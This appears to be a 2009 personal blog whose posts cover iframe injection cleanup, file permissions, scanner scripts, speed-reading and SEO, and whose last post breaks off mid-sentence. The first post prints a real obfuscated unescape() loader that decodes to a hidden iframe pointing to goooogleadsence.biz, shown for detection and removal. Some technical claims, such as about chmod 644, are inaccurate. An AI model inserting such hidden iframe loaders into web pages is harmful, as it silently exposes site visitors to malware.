Saturday, October 31, 2009

Obfuscated iFrame Injection Attacks

I have written several popular articles on iframe injections as you will find in this blog.

The people who implemented my suggestions, reported they had quite a bit of success in avoiding these malicious iframe injection attacks. Their websites were now safe and their traffic was continuous.

I had a friend who was a victim of these iframe injection attacks. When I tested his site, all tests indicated that his site was clean, but yet I knew this could not be the case. I checked all his index.* files and could not find any obvious hidden iframes. What I did notice was some codes that were obfuscated that my friend had no explanation for.

Obfuscation is the concealment of meaning in communication, making communication confusing, intentionally ambiguous, and more difficult to interpret. It is basically a form of encryption. The web page is not really encrypted, or else the web page would not display when accessed. The web browser can tell the difference between this encrypted code and regular HTML, but the human eye cannot decipher the encrypted code.

Upon further investigation, I found that compromised websites can be infected with hidden iframes and/or with obfuscated (escaped) javascript code. My friend's website appeared to be a victim of this obfuscated iframe injection.

The following was the suspected malicious iframe injection obfuscated code:

[Script Language='Javascript']
[!--
document.write(unescape('%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D'));
//-->
[/Script]

Researching the issue further I found a website that was able to deobfuscate, or decrypt, the code at:

http://www.novirusthanks.org/services/javascript-unescape/

or at:

http://www.patzcatz.com/unescape.htm

What you do is copy only the obsfuscated code as shown below:

%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D

You then paste the code into the form box they provide and then click on "Deobfuscate".

The following was the resulting malicious iframe injection code:

[iframe src= http: //goooogleadsence.biz/_click=8F9DA width=1 height=1 style= visibility:hidden;position:absolute ][/iframe]

By completely removing the obfuscated (escaped) javascript code, my friend's website was clean and safe again.

If you implement my suggestions, particulariy the CHMOD 444, after an iframe injection attack, and are fairly sure your website is clean, then chances are you may not be a victim of iframe injection obfuscated (escaped) javascript code. One must not forget though, that no website will ever be 100% secure which is why we must always practise preventative measures.

It is also important to remember that not all iframes are bad. Before you remove a suspected iframe, make sure it is not relevant to your web page. You might want to download a copy of the web page before you do any deleting just to be sure if your are not certain.

Friday, October 30, 2009

Using Your Maximum Concentration

Whenever I am working with my websites, I always put myself into a state of maximum concentration which I learned from my Photoreading course that I had taken. This is very critical when you are implementing changes to your website. You must give it your full concentration or else you could make mistakes that could hinder the operation of your website.

The Tangerine Method

To best read any material, one must first create the relaxed, alert state of body and mind essential for proper reading. When a person is relaxed and alert while reading, he/she is more likely to be faster, more fluent, and less distracted. He/she will be more able to comprehend, retain and recall what is read. One way to do this is to use the "Tangerine Technique".

Using the Tangerine technique, a reader can quickly and easily establish a relaxed state of alertness. It also automatically directs a person's available unit of attention. The result is an immediate improvement in reading skills. The Tangerine technique helps locate and maintain the ideal point of attention for reading.

The Tangerine technique is as follows:

1) Use your hand to reach out in front of you and pick up an imaginary tangerine. Imagine its color, skin texture, and maybe even the sweet, tangy smell. Then, lob it from hand to hand to sense its weight.

2) With your dominant hand, position the imaginary tangerine on the upper-rear portion of your head. Touch that area gently with your hand and imagine the tangerine floating a couple of inches above your head. Bring your hand down and relax your shoulders completely. Pretend this magical tangerine always stays there no matter how your head moves.

3) Close your eyes and let the tangerine balance where you left it. Notice what happens to your physical and mental state as you do this. You will feel relaxed and alert. With your eyes still closed, imagine your field of vision opening up.

4) Maintain the relaxed feeling of alertness as you open your eyes

By playing with this technique, you will navigate reading material with increased speed and fluency. Your ability to concentrate on the information improves and reading becomes more relaxing. For the first while, you will have to consciously place the tangerine just behind and above the back of your head. Soon it becomes an automatic (unconscious) process so that whenever you approach reading materials, the imaginary tangerine floats into place.

Your Ideal Reading State

Below is an 8 step method you can use before you read any type of reading material by entering into your Ideal Reading State.
It will help you to better understand and retain the information that you read. It incorporates the tangerine method.

1) Place the reading material in front of you but do not read it yet.

2) Begin to relax by taking a deep breath in and closing your eyes. Become aware of yourself from head to toe. Your spine is erect, your posture is comfortable, and your breathing is relaxed.

3) Mentally state to yourself your purpose for reading. Why are you reading the material? What information do you plan to get out of the material? What is your purpose, your goal for reading this material? Give yourself these positive affirmations.

4) Now enter your ideal state of mind by establishing your point of attention, by mentally placing the tangerine on the top back of your head. Once there, do not worry about keeping it in place. It will stay there by itself.

5) Become aware of yourself as relaxed and alert.

6) Bring a slight hint of smile to the corners of your eyes and the corners of your mouth to relax your face.

7) Imagine your visual field opening up. You have a direct eye mind connection. You do not see one word at a time but many words, or maybe even the whole sentence.

8) Now, at a rate that is comfortable to you, maintaining this state of relaxed alertness, gently open your eyes, and begin reading.

You will be amazed at the results.

Monday, October 19, 2009

Using File Permissions To Combat iFrame Injections

After posting my article on "Measures to Prevent and Detect iFrame Injection Attacks", I started to notice that many other people on the internet were linking to my article. They obviously felt that it was indeed an important weapon against combatting iframe injections.

As my article grew in popularity, I started to notice that iframe injection attacks against my website started to increase. I guess I was making some people very unhappy. As my website is constantly being monitored, I was able to react and remove these iframe injections almost immediately.

It soon occured to me that perhaps the file permissions on my web pages needed to be beefed up, made more restrictive.

As per my post on "Website Protection and Security Using File and Directory CHMOD", most website file permissions are:

Files: 644
Folders: 755 (with index page in it)
Images: 644
CGI scripts: 755
Php scripts: 644

Since iframe injections attack your index.* webpages, the CHMOD 644 may not be enough to protect them. CHMOD 644 gives you, the user, all read, write and execute permissions and everybody else only read and execute permissions. You would think that this should be enough to prevent an iframe injection. Unfortunately, it is not.

In my article on "Website Protection Against iFrame Injections", hackers may be attacking your website via a virus that they may have downloaded to your computer without you realizing it. Even though you change passwords, and remove the iframes, you may still be vulnerable to iframe injections. This virus could be sneaky enough such that the website logs will show that FTP traffic originated from a valid source, with valid FTP credentials. The result will be the same as a user logging into the website and thus will be able to write (modify) to the web page, adding the iframe injection. What we need to do then is to prevent writing to the web page. We need to change the web page file permission or CHMOD value.

The CHMOD capability depends on two conditions:

1) The server you are connected to must support the CHMOD command.
2) You must have access rights to change the attributes of that remote file or directory.

Make sure these two conditions are fulfilled.

It is also important to remember that you can set any non-script file to anything you like. You do not however want to set a directory or script to anything but CHMOD 755 if you want it to be able to run (for obvious security reasons). Only the owner of a file or root may change the permissions on a file no matter what its current permissions maybe.

Since the iframe injection attacks are against the index.* web pages, we need to prevent modifications of these web pages. Now suppose you have just finished modifying your index.html and you did not want anybody to update or to delete it. Then, give the web page file permission CHMOD 444 and it will have this effect. This gives everybody, including the owner (user), only read capability. If the owner turns off the write permission, the file is protected from accidental destruction. This is a pretty secure way to store HTML files when they are not being currently edited.

If you set file permission CHMOD 444 via FTP, then you may find that your host does not allow CHMOD 444 to be set via FTP - and even though you think you've changed to 444, it reverts back to 644. You may have to set CHMOD 444 via your host CPanel in a browser. Make sure you check this out. If you entered your site via FTP, edit your index.html file by adding a small change and then removing it. When you try to save the file, you should not be allowed to over-write it.

Once you have changed file persmission to CHMOD 444 on your web page, ensure that it still functions and runs properly. Whenever you need to edit your index.html page, simply change back to CHMOD 644, do your changes, and then change again to CHMOD 444.

Having to change file permissions everytime you need to edit a web page might feel a bit tedious. Preventing iframe injections to your website which could classify you as a risk site by Google, and hence, stop all traffic to your website, is well worth the extra few minutes needed to edit a web page via the CHMOD command.

Thursday, October 15, 2009

Modifications To The iFrame Scanner Tool File

If you have read the article, "Measures to Prevent and Detect iFrame Injection Attacks", then these little additons to the "detect-signature.php" iframe scanner file, will help give some order to your scanning, especially if you are doing hourly scanning on a 24 hour basis.

The following javascripts were available for free on the internet and I used them for my file, which helped to keep things in perspective.

All these javascripts are to be put between the body tags of the file, [body] and [/body].

Note: Due to Blog restrictions, the normal HTML brackets < > were replaced with [ ].

The following javascript will print the date on the file display web page. Put it right after the [body] tag.


The following javascript will print the time on the file display web page. Put it right after the previous date javascript.
You can also add a "close" button to close the web page after you view it.

If you press the close button, and are using IE 7.0, it will give you a pop up window that says:

"The webpage you are viewing is trying to close the window"

This happens becuause you opened the window via a hyperlink from a parent window. It is a browser security measure. Basically, if you did not open the window using javascript, you can't close it using javascript.

All you need to do to counteract this is put a javascript code in before the close button script.

Put these codes near the end of the file, just before the [/body] tag.


In case you suffered from an iframe injection attack, you will be able to know, very closely, the date and time of the attack. This is very critical to know if you are to avoid your website being classified as a potential risk site. The sooner you react to the attack, the less the chance of being classified as a malware or badware site by Google.

Tuesday, October 13, 2009

Measures to Prevent and Detect iFrame Injection Attacks

IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. The following is an example of a malicious iframe injection code:

iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden" /iframe

The iframe tag is an HTML tag used to seamlessly embed content from another page or site. (The “i” in “iframe” stands for “invisible”, i.e. “invisible frame”.) IFrames are used on thousands and thousands of sites, because that’s what Google uses for its AdSense ads — the little bit of JavaScript you paste on your page eventually ends up inserting an iframe into the HTML of your page.

Like most useful things, iFrames can be used for good or for bad.

An iframe injection is an injection of one or more iframe tags into a page’s content. The iframe typically does something bad, such as downloading an executable application that contains a virus or worm in it… something that compromises a visitor’s system.

Typically, all your index.* files in your server are infected with a piece of code that loads a hidden iframe in the page. Examples of these pages are:

index.htm
index.htmi
index.shtml
index.php

The intent of this article is to show what preventative measures you can use to prevent or detect iframe injection attacks to your website.

STEP 1

The first thing you need to do is to check with Google to see if your site is listed as suspicious. You can do this by using the following link:

http://www.google.com/safebrowsing/diagnostic?site=http://yourdomain_name

Before you use the link, you need to replace "yourdomain_name" with your actual website name.

Google will tell you if your website is suspicious or not.

You can also go to the following website and enter your "www.yourdomain_name/". It will advise you on your website status.

http://www.unmaskparasites.com/

STEP 2

If you have suffered an iframe injection attack you need to act fast. If the security of your website is compromised, it can affect the search engine rankings of your website. Besides, it may pave way for more sophisticated attacks. Google will mark your site in it’s search results with a warning: “This site may harm your computer”. If a visitor sees the message “This site may harm your computer” pop up when (s)he try to access your website/blog, (s)he may not return again and your traffic will go down to zero.

I suggest that you read the article "Website Protection Against iFrame Injections" which you can find in this Blog.

STEP 3

If you have not suffered and iframe injection attack, then you can manually run some scripts which will test the index.* files on your website.

One script you can use is called "clean.php" which you can download at:

http://www.diovo.com/wp-content/uploads/2009/04/clean.php.txt

Copy and paste this script into your text editor, such as notepad, and save the file as "clean.php"

It is important to remember that when you create a web page, it is important to use a pure text editor such as Notepad or an editor designed to create web pages. Never use Word or a word processor to create web pages. The files that word processors create contain formatting codes and other invisible information that can create problems with web servers. Also, when you save the web page, ensure that it has the proper file extension, e.g., index.html, clean.php, etc.

Before you can use the file, you need to change the following line in the script:

$webpath ="Type your domain name here. Eg:http://www.diovo.com/"

which will become:

$webpath ="http://www.yourdomain_name/

Where "yourdomain_name" is replaced with your actual domain name.

In the script, the "s" parameter specifies the file name to search for and the "c" parameter specifies the text to search for inside the file.

When you have pasted the above script into your notepad editor, made the change for your website name, save it as “clean.php”. Once you have saved the file, upload it to the root directory of your website.

Now you need to create a URL that you will copy and paste into your browser as follows:

http://www.yourdomain_name/clean.php?s=index.php&c=iframe

where "yourdomain_name" is replaced by your actual doamin name.

The web page to be checked is given by “s=index.php” and the text to be found is “c=iframe”. This will scan all your files and folders on your website for index.php injections.

Since we also want to check our index.html type web pages, we create a different URL as follows:

http://www.yourdomain_name/clean.php?s=index.html&c=iframe

The file to be checked is given by “s=index.html” and the text to be found is “c=iframe”. This will scan all your files and folders on your website for index.html injections.

The URL will list all the ”index.php” or "index.html" files in your website and if any of the files contains the given string, it will print the part with the string. You can see that one file is infected by displaying the iframe script.

Note that the script will not remove the iframes from your files. Automated cleaning could break some of your websites. So you will have to clean the files manually by deleting the iframe script.

You should be able to see that you can use the “s” parameter to test any web page on your website for iframe injection. Simply put in the exact webpage as follows:

s=webpage.ext

You can thus create simple internet URL shortcuts that you can click on to check the required web pages.

When the script tests for iframe injections, it is basically looking for the text "iframe" and so will display any web page that has the text "iframe". You need to ensure that the iframe being displayed is actually a malicious iframe, similar to the example shown previously. Sometimes it may be a legitimate iframe. Be absolutely sure before you delete it from your web page.

The "clean.php" iframe injection tool is quite useful when testing individual pages. However, after your website starts to grow, you will need to have a URL link for every web page extension (ext) which starts to be a time consuming effort, having to check each individual web page for iframe injection.

A website that gives a free script to test all the files on a website for iframe injection is given at the following link:

http://www.websanity.co.uk/blog/2009/08/scan-website-files-for-iframe-injection.html

The file is called "detect-signature.php"

When you have dowloaded the file, there are a couple of lines in the script that I suggest you change. This will help make the script more suitable for your website.

Using your notepad editor, open the file. First locate the following line:

define('IGNORE_EXTENSIONS',"jpg pdf zip psd doc gif swf xls"); // Ignore files of these types

You will see that the file will ignore files with extensions jpg, pdf, zip, etc. You can add or delete files as you feel necessary.

Next, locate the following line:

define("IGNORE_BEFORE", strtotime('2009-08-01') );

The file will ignore any web pages created before August 1, 2009. You may want to change this to ensure all your website files are tested. You could simply change 2009 to 2008.

You will be downloading the “detect-signature.php” as a zip file. After download, extract the file. Using the notepad editor, open the file and change the suggested lines to what suits your needs and re-save. Upload the file to the root directory of your website.

To activate, you need to create the following URL for your domain:

http://www.yourdomain_name/detect-signature.php

You can either create a URL short cut or else copy and paste the URL into your browser. Put in your exact domain name for “yourdomain_name”.

When the file is activated, it initially starts by checking every file and web page on your website, unless you have excluded it.

Once the scan is complete, you have two more options you can use for scanning for iframe injection. You can either have the scan stop at the first error (iframe injection) or have it display all errors (all files and web pages with iframe injection). You can continuously click on any of the three links on the web page scan results.

When you do find iframe injections, you need to evaluate if the iframe injection is of the malicious form as indicated previously. If it is, you need to remove it from your web page. Open up your web page with a notepad editor if you have entered your site via FTP, find the iframe injection, delete it and re-save your web page. If you have a complete up-to-date backup of your web page, you can just upload it to your website. It will over-write the web page with the iframe injection.

What I like about this file is that it can check every web page on your website. Although the primary intent is to check all the index.* web pages, checking your other web pages is an added benifit as they might also be attacked. Just make sure that when ever you do find an iframe injection, it is really a malicious iframe.

STEP 4

Having the ability to manually check for iframe injections goes a long way in helping keep your website secure. The final step now is to automate the iframe scanning in case you forget. This will be your constant watch dog.

The best way to do this is to schedule the iframe scanning, say every hour. A nice free System Scheduler can be found at:

http://www.splinterware.com/download/index.htm

Once you have downloaded the System Scheduler, install it. We will schedule the file "detect-signature.php" on your website to run a scan every hour.As mentioned previously, there are three ways to run the file. We can check and display all files, check and display only errors, or, check and display errors only. The error is the iframe injection. We will use the 3rd option so we will need to use the following URL in the System Scheduler:

http://www.yourdomain_name/detect-signature.php?display_errors_only

When the file runs, it will show any iframe infected files. If you see errors, you need to take immediate action.

We will now schedule the file. Open System Sceduler. Select the "Action" menu and then select "New Event", You should now be in the Event dialog box. For Event type you can leave "Run Application". Give the event a title such as "iFrame Injection Scan". In the Application box, input the complete URL to display errors only, with your actual domain name. In "Working Dir" put any directory on your computer. In "State" box, select Maximized.

We now need to scedule when we want to run the scan. Select the "Scedule" tab. For "Scedule Type, select "Every Hour / Selected Minutes". In the left bottom boxes, select "Every Hour" and "On The Hour". This means the scan will run, e.g. at 1:00 pm, 2:00 pm, 3:00 pm, etc., for the daily 24 hour time frame. Now go to "Action" menu and Save and Exit. You should see the System Schedule icon in your right bottom tool bar. This icon must always be displayed in order for the event to run.

Every hour on the hour, your web page will be activated and your website scanned for iframe injections. Look over the results and take action if necessary, otherwise close the web page. If you do not close the page, you will see multiple web pages of the same thing. You simply need to look them over and close them. If you are running the scan constantly over night, you will see the multiple web pages in the morning.

You do not have to run every hour on the hour. You can select what ever time schedule you prefer. If you have been attacked, I strongly recommend you stay with hourly scanning.

To help things be a bit clearer, I added the date and time in the "detect-signature.php" file so I knew the exact date and time, the scan was made. You can search the internet for java script that you can add. It is very easy to do and will give order to your scanning.

STEP 5

If you follow all the measures stated in this document, you will prevent your website from becoming a victim of iframe injection attacks. It is also important to note that your website may not be the only victim. Your home PC may also be a victim. You must also have preventative measures on your PC. Make sure you read the article "Website Protection Against iFrame Injections" as mentioned previously. This is a must.

Website security and monitoring is a vital part of the success of your online business. Making it a priority is crucial for your website file and data protection. Understanding that and taking the steps to properly implement website security practices can mean increased sales and more business opportunities.

Saturday, October 10, 2009

How To Submit Your Blogger Blog To Search Engines

After creating my blogs, I wanted to submit them to the major search engines in the same way as I did with my websites. I wanted to do a complete submission rather than just submit a URL that would have an unkown time for indexing, being added to the search engine directory.

After submitting my blog, it then had to be verified. This could be done either by inserting a meta tag generated by the search engine webmaster or uploading a generated HTML page to the root directory of the blog. For my websites this was easy to do as I could just FTP to my site or modify my home page. For my blog it was a different matter since I really had no access other than posting, so I thought.

Figuring I was not the only one with this problem, I surfed the net to see if anyone else was in a similar position. What I was able to finally determine was that on Blogger, I actually could modify my template, which in fact was my home page. By figuring out how to do this, I could add the verification meta tag required.

To submit your blog to Google:
Go to: https://www.google.com/accounts/ManageAccount

You first need to create an account if you do not have one.
You then select "Webmaster Tools" to add your website. Use menu on the left of the page.
Click on the "Add a site..." button and then enter the URL of your blog which should be something like:

http://yourblogname.blogspot.com/

Now click on the "Continue" button, and you will be shown what is called a Meta tag. This is shown in the "Verification method" drop down box. If it isn't, select it.

You will see something similar to below:

meta name="google-site-verification" content="IfUqWNCzBwC2qU87G8nGrOoIFq5RTF-Zwel8NTF6rk8"

The meta tag is normally enclosed with <......./>. They have been omitted due to this blog's restriction but are needed.

The whole sentence above is your complete meta tag that you need to add to your blog template.

Now go to your blog and sign-in. You should end up at your Dashboard.
Click on "Layout" and then "Edit HTML" on top of the page. You should now see your home page template.

You will notice at the top that you have the option to download your template before you modify it. It is strongly suggested that you do this just in case something goes wrong.

Go to the HTML code and find the [ head ] tag . Using your keyboard create a blank line just below this tag.
Now go back to the webmaster page and copy the verification Meta tag completely, including the beginning and ending brackets <, />.

Go back to your template HTML code and paste the verification Meta tag in the blank line you had created. Click on "Save Template" and you are finished.

Finally, go back to the webmaster page and click on the "Verify" button. If all went well, your site should get verified.

To Submit your blog to Yahoo:

Go to: https://siteexplorer.search.yahoo.com/submit

You first need to create a Yahoo ID if you do not have one. You can then add your website.

As was described for Google submission, you will also need to add a Yahoo authentication Meta tag to your blog template. Choose the option "By adding a Meta tag to my home page". As before you will need to copy and paste it.

I found one problem with the Yahoo verification Mega tag when I tried to add it to my template. The Yahoo Meta tag was enclosed with the brackets <, >. To be properly saved in the template the meta tag must be enclosed with the brackets <, /> in order to work properly. The end bracket was not preceeded with the / as required.

As before, sign-in to your blog, click "Layout" and then "Edit HTML". Download your template before you modify it.

Locate the tag [ head ]. Using your keyboard, create a blank line below this tag. If you had added the Google verification Meta tag, create the blank line below the Google tag. Copy and paste the Yahoo verification Meta tag in this blank line. Do not forget to add the "/" to the end of the Meta tag bracket so that it becomes />. Save your template and now you are finished.

On your webmaster page click on the "Ready to Authenticate" button. If all goes well, your blog should get authenticated.

By submitting your blogs to Google and Yahoo, you can keep checking your accounts and see when your blog does get indexed. For other search engines, you can follow the same steps as desribed for Google and Yahoo.

Other Meta Tags

After my submissions to Google and Yahoo, I got to thinking about other Meta tags I could add to my blog template (home page) to help it get better noticed by the search engines.

The following appear to be the most suggested Meta tags that should be used in your template:

- Description META Tag

- Keywords META Tag

When you create these Meta tags, insert them after any Verification or Authentication meta tags you may have added previously.

For help on adding website security, you can visit:

http://www.websiteprotection.net/

If you are disillusioned or struggling with your current internet marketing campaign, you can get help by visiting:

http://www.nichemarketingsecrets.net/

If you want a one-stop solution center with plenty of important and helpful information you can visit:

http://www.schembrionics.com/

Friday, October 9, 2009

Tips on How to Increase Search Engine Page Ranking

Having a website is no guarantee that people will visit, no matter how good your website may be. Your websites presence is very important to your survival. You need to get people to see, or hear about your website. This will increase your credibility and will increase your chances of having these visitors come back and possibly become leads.

The following are some methods that I have used that have put my websites in the first 30 results of search engines such as Google, Yahoo, Bing (MSN), Altavisa and AllTheWeb, even though there was a heavy competition with other websites. Website ranking is about your position in the search engine results for a particular keyword.

1. Submit Your Websites To Many Search Engines

You need to get your website indexed on as many search engines as possible. Most often this is free and very easy to do. If you can submit a sitemap with your submission, it will help make things easier. There are many free tools on the internet that will help you create a sitemap that you can submit. Take advantage of this.

The following are links to 3 of the larger search engines. Many smaller search engines use these larger ones so that often, you will automatically be included with these also.

Google: https://www.google.com/accounts/ManageAccount
You first need to create an account. You then select "Webmaster Tools" to add your website. Use menu on the left of the page. When you have added your site, submit your sitemap under Site Configuration You will also need to verify your site by either a "META tag" or upload web page to your root directory which is all explained

Yahoo: https://siteexplorer.search.yahoo.com/submit
You first need to create a Yahoo ID. You can then add your website. Use the "Feeds" to submit your sitemap. You will also need to verify your site by either a "META tag" or upload web page to your root directory which is all explained

Bing (MSN): http://www.bing.com/webmaster/
You first need to create a new Windows Live ID Add your site and also submit your sitemap. You will also need to verify your site by either a "META tag" or upload web page to your root directory which is all explained

Most search engine directories allow you to submit to their website for free. This will allow you to increase your web presence by being listed on another search engine, and it will also be a free link.

It sometimes takes a while before your web pages become indexed, added to the search engine directory.

You can check what pages are indexed by using the following website:

http://www.selfseo.com/search_engines_index_report.php

2. Content

Good content on your web pages is crucial to your website success. When creating your web page content, choose good keywords that relate to your site. Do not add hundreds of keywords or else this may be considered spam. Having about 25 keywords will make your site crawler friendly. Research what keywords people use most often on search engines that pertain to your products or services; use these keywords as text in the design to increase website traffic.

Every 3 months or so, you should make a small change on each web page. Search engines like to see that changes are being made to a site and that it just isn't sitting there for years with no upgrades.

Keep track of your search engine rankings. Once a website is indexed, you should go back and improve pages that didn't get high rankings on key words.

3. Backlinks

To increase page rank rapidly, you have to get as many good quality links (backlinks) to your page that are relevant to the content of your page as you can. There are many ways to get links including, reciprocal linking with other sites, posting on blogs and forums, article marketing, and press releases just to name a few.

I have found the most effective is to write articles and submit them to directories for publication distribution. In some cases, my articles have appeared before my website which helps in getting your website noticed earlier.

In your author biography make sure you include a link to your website as well as links in your article to your website.

I have found the following article submission locations very helpful in getting good backlinks:

http://www.articler.com/

http://www.goarticles.com/

http://www.articlesbase.com/

http://ezinearticles.com/

http://www.articlealley.com/

4. META Tags

Make sure your META TAGS are done right. Create good Meta Tags. Each page should have different keywords in the Title and the Description Meta Tag. Limit the number of times that you repeat words in your Keyword Meta Tag. Place your important keywords at the top of the page as text headers. Your most important page and keywords should be on the first page of a website.

I have found some websites that have on-line tools to help you create meta tags and to check your overall index page to see how "Spider" friendly it is. Search engines are like spiders that crawl the internet.

To help in creating Meta tags I have used the following:
http://www.submitcorner.com/Guide/Meta/

To see how spider friendly my Meta tags are, I use the following tools:
http://websitesubmit.hypermart.net/metataganalysis.htm
http://www.submitexpress.com/analyzer/
http://www.seocentro.com/tools/search-engines/metatag-analyzer.html

When you use these tools to check your website, you must also use your own logic. Suggestions are given but it must be up to you if and when you use them. Use them primarily as a guide as they have indeed helped my websites.

5. Monitoring Your Site

Once you have submitted your site to a search engine be sure you find out from the FAQ's listed (sometimes) on that particular Search engines site, as to how it works.
For example:
Some search engines will automatically drop your listing after a preset time. Others won't.
Some search engines will penalize (even permanently 'ban' your site) if you re-submit it too often.

Bottom Line - make sure you find out these things about the search engine you are submitting to and then comply with their rules.

To check your Website ranking for a particular keyword go to the search engine whose position you want to check, and enter your keyword. You then need to go through the results and try to locate your Website URL in the results.

This manual method of checking your website's position/search engine ranking is both time consuming and tedious. It is however the most reliable and search engine friendly.

You can, however, also use some tools to find your page ranking until you arrive at the rank you want. You can then use the manual method.

I have found the following tools very helpful:
http://www.mikes-marketing-tools.com/ranking-reports/
http://www.seochat.com/seo-tools/pagerank-search/

Quite often, when people are creating their website, they tend to forget about adding website protection and security. It is critical that one adds homepage protection and security, as well as, individual web page protection and security. If information security is not implemented in your website design strategy, one can get leeching and hot linking of important digital files and images, as well as, illegal downloading of your digital products. It is vital that you add website protection in order to have universal protection security.

For help on adding website security, you can visit:

http://www.websiteprotection.net/

If you are disillusioned or struggling with your current internet marketing campaign, you can get help by visiting:

http://www.nichemarketingsecrets.net/

If you want a one-stop solution center with plenty of important and helpful information you can visit:

http://www.schembrionics.com

Website Protection Using The Index Page

All web servers are configured to display a default page for a directory if a default file exists. That is how your home page is found when someone simply enters a domain name for the URL for a web site and the home page is displayed. A server is configured to search a list of default file names and if it finds a match, it displays the page. The default files could be similar to what is shown below.

index.htm
index.html
index.shtml
index.php

When someone goes to your site by typing in your URL, the index page is what they normally see first. This prevents viewing other pages or files you may have in the root directory. What your visitor actually sees in this case is your home page.

The other directories(sub-folders) on your website, the ones below your root directory, which is typically called "public", or "public_html", do not normally have this index page. If the index page is not there, your visitor may be able to view every web page or file you have in that directory. A folder without an index page is open and everyone can find your product if they search for it. You thus should create an index page for all your folders.

You can verify whether or not your site is configured to prevent directory listing. You can test this by entering your URL domain name and a directory name for any directory that exists in your site in your web browser (e.g. http://www.yourdomain_name/temp). Doing this should generate a browser error page or list the contents of the directory.

If we assume you have a subdirectory named temp as given by the previous example, you will see the following if directory listing is not prevented.

Index of / temp
Name--------------------Last Modified----------Size
Parent Directory--------30-Apr-2009 11:09--- -
document1.txt-----------29-Apr-2009 10:03--- 20k
document2.pdf-----------28-Apr-2009 06:10--- 1831k
document3.doc-----------27-Apr-2009 09:10--- 568k

The above example shows the complete directory listing of the folder called temp. All someone has to do is to click on the file to open and possibly modify it. They can also download any of the files in the directory. If you happen to be in this situation, you need to add some website protection to your sub-folders.

We see then that if no index page exists on a server configured to prevent listings, an error is normally generated. But when a server is configured to allow a directory listing, the directory index is displayed rather than generating an error.

The index page can be used in any directory on a web site except those directories that already utilize an index page or default page. This includes the root directory. Never place one of these files in the root directory, never overwrite an index page or default page that already exists and never place an index page in a directory where another index page or default page already exists.

The subfolders index page does not have to be anything special. It can be a very simple HTML page as you are only using it to close the door on your folders. The following shows a simple index page you can use.
----------------------------------------------------------------------------------------------
!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"http://www.w3.org/TR/html4/loose.dtd
html
head
/head
body
/body
/html
-----------------------------------------------------------------------------------------------
The above would show a blank web page. Instead of seeing all the files that you have in sub-folder temp, they would simply see a blank web page.

If you want, you can put some text or graphics between *body* and */body*.
You can add some text that perhaps says: "Internal server error. Please contact system administrator."

The text will give the impression that the person trying to get into your site, caused some type of server error and so will hopefully stop them from going any further. The modified index page is shown below.

------------------------------------------------------------------------------------------------
!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"http://www.w3.org/TR/html4/loose.dtd
html
head
/head
body
h1Server Error/h1
Internal server error. Please contact system administrator.
/body
/html
------------------------------------------------------------------------------------------------
You can also take the index web page one step further. You can redirect spying eyes from your website directories back to your home index page in your root directory. You can use what is called a "meta refresh" tag. The tag looks like the following:

META HTTP-EQUIV="refresh" content="0;URL=http://www.yourdomain_name"

You would replace "yourdomain_name" with your actual domain name or whatever URL you would like to put there.

The following shows the index page with the meta refresh tag:
------------------------------------------------------------------------------------------------
!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"http://www.w3.org/TR/html4/loose.dtd
html
head
META HTTP-EQUIV="refresh" content="0;URL=http://www.yourdomain_name"
/head
body
/body
/html

If you are using an index page with the meta-refresh tag only, then instead of someone seeing a blank web page, they actually get re-directed to your Home page. If this was a casual surfer who just happened to end up at your website by mistake, then they will find themselves on your Home front page, and, you might end up getting a customer, a good side benefit of the index.html page with meta-refresh tag.

To learn more about Website Protection and Security, please visit:

http://www.websiteprotection.net/

It is important to remember that when you create an index page, it is important to use a pure text editor such as Notepad or an editor designed to create web pages. Never use Word or a word processor to create web pages. The files that word processors create contain formatting codes and other invisible information that can create problems with web servers. Also, when you save the index page, ensure that it has the proper file extension, e.g., index.html

Website Protection and Security Using File and Directory CHMOD

A variety of files and directories in your website need to be given the correct permissions to work properly. Giving permissions to files or directories in the Unix world is called CHMOD (change mode). Chmod is a Unix command that lets permission levels be assigned to each file or directory. The proper CHMOD is also needed to help you with your website protection and security. As you will see later in this document, you can use your FTP client to change the file permissions in order to protect your files.

Every file or folder in UNIX has access permissions. There are three types of permissions (what allowed to do with a file):

1) read access
2) write access
3) execute access

These specific permissions apply as follows:

Read
The read permission, which grants the ability to read a file. When set for a directory, this permission grants the ability to read the names of files in the directory (but not to find out any further information about them, including file type, size, ownership, permissions, etc.)

Write
The write permission, which grants the ability to modify a file. When set for a directory, this permission grants the ability to modify entries in the directory. This includes creating files, deleting files, and renaming files.

Execute
The execute permission, which grants the ability to execute a file. This permission must be set for executable binaries (for example, a compiled c++ program) or shell scripts (for example, a Perl program) in order to allow the operating system to run them. When set for a directory, this permission grants the ability to traverse its tree in order to access files or subdirectories, but not see files inside the directory (unless read is set )

When a permission is not set, the rights it would grant are denied. Files created within a directory will not necessarily have the same permissions as that directory.

Access permissions for files and folders mean different things from the user standpoint. Below shows the difference

Read Access For File:
On a regular file, the read permission bit means the file can be opened and read
Read Access For Directory:
On a directory, the read permission means you can list the contents of the directory.

Write Access For File:
On a regular file, this means you can modify the file, aka, write new data to the file, change its contents
Write Access For Directory:
